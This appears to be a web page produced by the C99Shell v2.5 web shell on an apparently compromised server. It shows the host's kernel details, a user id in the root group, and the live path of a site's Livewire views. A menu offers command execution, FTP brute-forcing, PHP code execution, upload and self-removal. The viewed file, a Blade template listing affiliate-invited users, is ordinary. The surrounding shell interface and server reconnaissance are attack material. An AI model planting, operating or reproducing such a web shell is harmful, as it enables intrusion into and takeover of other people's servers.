!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/livewire/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     affiliate-invited-users.blade.php (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div>
    <div
        class="space-y-[1rem] rounded-[0.75rem] border border-gray-100 dark:border-gray-600 shadow-[0px_1px_2px_0px_rgba(28,33,38,0.06),0px_1px_3px_0px_rgba(28,33,38,0.10)] p-[1.5rem]">
        <h6 class="body-md-500 text-gray-900 dark:text-white">{{ __('invited_users') }}</h6>
        <div class="divide-y divide-gray-100" id="affiliateInvitedUsersContainer">
            @if ($affiliateInvitedUsers->isNotEmpty())
                @foreach ($affiliateInvitedUsers as $index => $data)
                    <div
                        class="flex items-center justify-between pb-[1rem] affiliate-invited-user {{ $index >= $visibleRows ? 'hidden' : '' }}">
                        <div class="flex items-center gap-[0.75rem]">
                            <p class="body-md-400 text-gray-800">{{ $data->email }}</p>
                            <span
                                class="body-md-400 text-gray-600 dark:text-gray-100">{{ date('d M, Y', strtotime($data->created_at)) }}</span>
                        </div>
                        <div class="text-success-500 heading-07">
                            +{{ $data->points }} Points
                        </div>
                    </div>
                @endforeach
                @if (count($affiliateInvitedUsers) > $visibleRows)
                    <div class="w-full flex items-center justify-center">
                        <button wire:click="loadMore"
                            class="body-md-500 text-primary-500 dark:text-primary-50 hover:text-primary-600 transition-all duration-200 text-center">
                            {{ __('load_more') }}
                        </button>
                    </div>
                @endif
            @else
                <p class="dark:text-white">{{ __('no_data_found') }}</p>
            @endif
        </div>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--